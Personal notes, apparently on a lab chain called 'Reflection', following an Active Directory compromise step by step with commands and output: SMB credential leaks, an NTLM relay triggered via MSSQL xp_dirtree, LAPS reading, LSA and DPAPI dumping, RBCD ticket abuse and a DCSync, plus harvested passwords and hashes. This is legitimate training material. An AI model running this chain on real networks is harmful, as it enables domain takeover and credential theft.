Reflection (Chain)

This is not a writeup, just my notes about the machine.

Operating System: Microsoft Windows Server 2022 Standard

Chain: True (3 Machines)

Credentials

Username	Password	Method	Scope
web_staging	Washroom510	Leaked on SMB Folder	Domain User/MSSQL on MS01
dev01	Initial123	MSSQL	User on MS01
dev02	Initial123	MSSQL	User on MS01
web_prod	Tribesman201	NTLM Relay	MSSQL user on DC01
abbie.smith	CMe1x+nlRaaWEw	MSSQL	Domain User
dorothy.rose	hC_fny3OK9glSJ	MSSQL	Domain User
Rhys.Garner	knh1gJ8Xmeq+uP	LSA	Domain User

✅ Valid Usernames

web_staging
dorothy.rose
abbie.smith
web_prod
Rhys.Garner

🔑 Passwords list

Washroom510
Initial123
Tribesman201
CMe1x+nlRaaWEw
hC_fny3OK9glSJ
knh1gJ8Xmeq+uP

Information Gathering

Nmap scan

Nmap scan report for 10.10.241.133
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 127
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
58981/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Nmap scan report for 10.10.241.134
PORT      STATE SERVICE       REASON          VERSION
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
445/tcp  open  microsoft-ds? syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services

Nmap scan report for 10.10.241.135
PORT      STATE SERVICE       REASON          VERSION
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
445/tcp  open  microsoft-ds? syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services

Service enumeration

10.10.241.133

SMB

• Domain SID: S-1-5-21-3375389138-1770791787-1490854311

• Netbios: DC01

• FQDN: dc01.reflection.vl

• Domain: reflection.vl

• Parent Domain

• Allows null session authentication

• signing: False

DNS

• Not vulnerable to AXFR

10.10.241.134

SMB (enum4linux-ng)

• Server allows null session authentication

• Server allows guest session authentication

• FQDN: ms01.reflection.vl

• signing: False

10.10.241.135

SMB

• FQDN: ws01.reflection.vl

• signing: False

Compromising MS01

Discovering a valid credentials

❯ nxc smb 10.10.241.134 -u 'Intrusionz3r0' -p '' --shares -M spider_plus
SMB         10.10.241.134   445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.241.134   445    MS01             [+] reflection.vl\Intrusionz3r0: (Guest)
SPIDER_PLUS 10.10.241.134   445    MS01             [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.241.134   445    MS01             [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.241.134   445    MS01             [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.241.134   445    MS01             [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.241.134   445    MS01             [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.241.134   445    MS01             [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.241.134   445    MS01             [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.10.241.134   445    MS01             [*] Enumerated shares
SMB         10.10.241.134   445    MS01             Share           Permissions     Remark
SMB         10.10.241.134   445    MS01             -----           -----------     ------
SMB         10.10.241.134   445    MS01             ADMIN$                          Remote Admin
SMB         10.10.241.134   445    MS01             C$                              Default share
SMB         10.10.241.134   445    MS01             IPC$            READ            Remote IPC
SMB         10.10.241.134   445    MS01             staging         READ            staging environment
SPIDER_PLUS 10.10.241.134   445    MS01             [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.241.134.json".
SPIDER_PLUS 10.10.241.134   445    MS01             [*] SMB Shares:           4 (ADMIN$, C$, IPC$, staging)
SPIDER_PLUS 10.10.241.134   445    MS01             [*] SMB Readable Shares:  2 (IPC$, staging)
SPIDER_PLUS 10.10.241.134   445    MS01             [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.241.134   445    MS01             [*] Total folders found:  0
SPIDER_PLUS 10.10.241.134   445    MS01             [*] Total files found:    1
SPIDER_PLUS 10.10.241.134   445    MS01             [*] File size average:    50 B

❯ cat staging_db.conf
user=web_staging
password=Washroom510
db=staging%        

Connecting to MSSQL and discovering a valid user credentiales

❯ impacket-mssqlclient ms01.reflection.vl/web_staging:'Washroom510'@10.10.241.134
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (web_staging  guest@master)> 

SQL (web_staging  guest@master)> SELECT name FROM master.dbo.sysdatabases;
name      
-------   
master    

tempdb    

model     

msdb      

staging   

SQL (web_staging  guest@master)> use staging;
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
staging         dbo            users        b'BASE TABLE'   

SQL (web_staging  dbo@staging)> select * from users
id   username   password        
--   --------   -------------   
 1   b'dev01'   b'Initial123'   

 2   b'dev02'   b'Initial123'   

SQL (web_staging  dbo@staging)> 

NTLM Relay Attack via socks proxy

The previous enumeration indicated that some servers did not have SMB signing disabled, making them vulnerable to NTLM Relay attacks.

Setting up the ntlmrelayx tool to initiate a interactive shell.

❯ sudo impacket-ntlmrelayx -smb2support -t 10.10.241.133 -i
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections

Triggering the authentication to perform the relay

SQL (web_staging  guest@master)> exec xp_dirtree '\\10.8.5.48\smbfolder'

Output from impacket-ntlmrelayx tool.

[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.241.134, attacking target smb://10.10.241.133
[*] Authenticating against smb://10.10.241.133 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000

Downloading the database production user.

❯ nc 127.0.0.1 11000
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# ls
drw-rw-rw-          0  Wed Jun  7 13:44:26 2023 .
drw-rw-rw-          0  Wed Jun  7 13:43:22 2023 ..
-rw-rw-rw-         45  Thu Jun  8 07:24:39 2023 prod_db.conf
# get prod_db.conf

❯ catn prod_db.conf
user=web_prod
password=Tribesman201
db=prod%                                                                                                                                                                                  

Discovering users credentiales on MSSQL table

❯ impacket-mssqlclient ms01.reflection.vl/web_prod:'Tribesman201'@10.10.241.133
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
SQL (web_prod  guest@master)> SELECT name FROM master.dbo.sysdatabases;
prod     
SQL (web_prod  guest@master)> use prod;
SQL (web_prod  dbo@prod)> select * from prod.information_schema.tables;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
prod            dbo            users        b'BASE TABLE'   

SQL (web_prod  dbo@prod)> select * from users;
id   name              password            
--   ---------------   -----------------   
 1   b'abbie.smith'    b'CMe1x+nlRaaWEw'   

 2   b'dorothy.rose'   b'hC_fny3OK9glSJ'   

SQL (web_prod  dbo@prod)> 

Using a valid credentials the tester proceeded to enumerate the domain controler by using bloodhound.

Reading LAPS password on MS01

The user abbie.smith possesses GenericAll over MS01 which means the user can abuse of this machine using RBCD or reading the LDAP password. (RBCD was not possible due the MachineAccountQuota is 0)

❯ bloodyAD --dc-ip 10.10.241.133 -d reflection.vl -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' get object 'MS01$' --attr ms-Mcs-AdmPwd

distinguishedName: CN=MS01,OU=servers,DC=reflection,DC=vl
ms-Mcs-AdmPwd: H447.++h6g5}xi

Dumping DPAPI and LSA credentials on MS01

❯ nxc smb 10.10.210.214 -u 'Administrator' -p 'H447.++h6g5}xi' --local-auth --lsa
SMB         10.10.210.214   445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         10.10.210.214   445    MS01             [+] MS01\Administrator:H447.++h6g5}xi (Pwn3d!)
SMB         10.10.210.214   445    MS01             [+] Dumping LSA secrets
<SNIF>
SMB         10.10.210.214   445    MS01             REFLECTION\svc_web_staging:DivinelyPacifism98

 nxc smb 10.10.210.214 -u 'Administrator' -p 'H447.++h6g5}xi' --local-auth --dpapi
SMB         10.10.210.214   445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         10.10.210.214   445    MS01             [+] MS01\Administrator:H447.++h6g5}xi (Pwn3d!)
SMB         10.10.210.214   445    MS01             [*] Collecting User and Machine masterkeys, grab a coffee and be patient...
SMB         10.10.210.214   445    MS01             [+] Got 10 decrypted masterkeys. Looting secrets...
SMB         10.10.210.214   445    MS01             [SYSTEM][CREDENTIAL] Domain:batch=TaskScheduler:Task:{013CD3ED-72CB-4801-99D7-8E7CA1F7E370} - REFLECTION\Georgia.Price:DBl+5MPkpJg5id

Compromising WS01

Abusing Resource Based Constrained Delegation

❯ impacket-rbcd -delegate-from 'MS01$' -delegate-to 'WS01$' -action 'write' 'REFLECTION.vl/Georgia.Price:DBl+5MPkpJg5id'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] MS01$ can now impersonate users on WS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     MS01$        (S-1-5-21-3375389138-1770791787-1490854311-1104)

Requesting Ticket Granting Ticket via S4U

❯ impacket-getST -spn 'cifs/ws01.reflection.vl' -impersonate 'administrator' 'reflection.vl/MS01$' -hashes :c4b7d1086f04073b2b2f71cb075b3d52 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache

Authenticating into WS01 as NT Authority System

❯ KRB5CCNAME='administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache' impacket-smbexec -k -no-pass ws01.reflection.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

Dumping SAM and LSA Secrets

❯ KRB5CCNAME='administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache' impacket-secretsdump -k -no-pass ws01.reflection.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
<SNIF>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29542cb2707bf6d6c1d2c9311b0ff02::: 
reflection.vl\Rhys.Garner:knh1gJ8Xmeq+uP

Compromising Domain Controller (DC01)

During the enumeration, the tester discovered a user named DOM_RGARNER, which looked similar to the previously obtained username, Rhys.Garner. The tester then proceeded to use NetExec to check the credentials.

❯ nxc smb 10.10.210.213-215 -u 'dom_rgarner' -p 'knh1gJ8Xmeq+uP'
SMB         10.10.210.215   445    WS01             [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.210.214   445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.210.213   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.210.215   445    WS01             [+] reflection.vl\dom_rgarner:knh1gJ8Xmeq+uP (Pwn3d!)
SMB         10.10.210.214   445    MS01             [+] reflection.vl\dom_rgarner:knh1gJ8Xmeq+uP (Pwn3d!)
SMB         10.10.210.213   445    DC01             [+] reflection.vl\dom_rgarner:knh1gJ8Xmeq+uP (Pwn3d!)

Performing DCSync attack to compromise reflection.vl

❯ impacket-getTGT reflection.vl/dom_rgarner:'knh1gJ8Xmeq+uP'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in dom_rgarner.ccache

❯ KRB5CCNAME='dom_rgarner.ccache' impacket-secretsdump -k -no-pass dc01.reflection.vl -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a87a3e893c70111c8cad0ecbda9f4002:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2d2ca00cb0d7484b07eba9b00937b9e8a537089e69bbd4a8551dbad0ecae5993
Administrator:aes128-cts-hmac-sha1-96:da61094f6772529865c6b58d0ac3e1df
Administrator:des-cbc-md5:34f23e130d7aa77f